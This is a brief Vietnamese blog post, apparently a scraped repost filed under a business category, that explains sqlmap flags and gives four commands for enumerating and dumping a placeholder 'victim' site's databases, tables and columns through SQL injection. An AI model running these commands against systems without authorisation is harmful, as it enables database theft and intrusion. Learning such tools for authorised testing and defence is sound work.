Kinh Doanh✅

Sử dụng Sqlmap khai thác lỗ hỏng SQL Injection



Lỗ hổng SQL Injection khá cơ bản và cũng rất nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever

Các lệnh cơ bản
-u = đường dẫn url
–dbs = Liệt kế databases
-D = ( DBMS ) Database Management System ” Hệ thống quản lý cơ sở dữ liệu”
-T = tables
-C = columns
–dump = Xuất dữ liệu
# sqlmap -u victim –dbs
# sqlmap -u victim -D Tài khoản –tables
# sqlmap -u victim -D Tài khoản -T Info –columns
# sqlmap -u victim -D Tài khoản -T Info -C Info columns a,b,c –dump

#KaliLinux
#sqlmap
#SQLInjection
#Thekalitips

source: https://sebastienizambard.net/

Xem thêm các bài viết về Kinh Doanh: https://sebastienizambard.net/category/kinh-doanh/

2 Comments

  1. The Kali Tips 06/11/2019
  2. Jame Lewis 06/11/2019

Leave a Reply